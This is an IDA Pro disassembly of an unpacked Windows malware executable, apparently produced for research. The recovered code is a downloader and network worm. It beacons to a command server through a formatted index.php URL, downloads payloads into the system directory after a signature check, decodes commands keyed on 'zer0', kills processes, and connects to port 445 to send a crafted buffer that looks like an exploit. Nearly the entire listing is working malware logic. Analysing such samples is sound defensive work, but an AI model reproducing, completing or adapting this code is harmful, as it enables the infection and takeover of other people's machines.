;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : D9E002026F71F1D9805AAE5D7FFA3FAE
; File Name : u:\work\d9e002026f71f1d9805aae5d7ffa3fae_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; dword_31421088
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; dword_31421088
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; dword_3142112C
push edi
call esi ; dword_3142112C
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; dword_31421098
push 0
push offset dword_31424FEC
call ebx ; dword_31421098
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; dword_31421094
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; dword_31421168
push edi
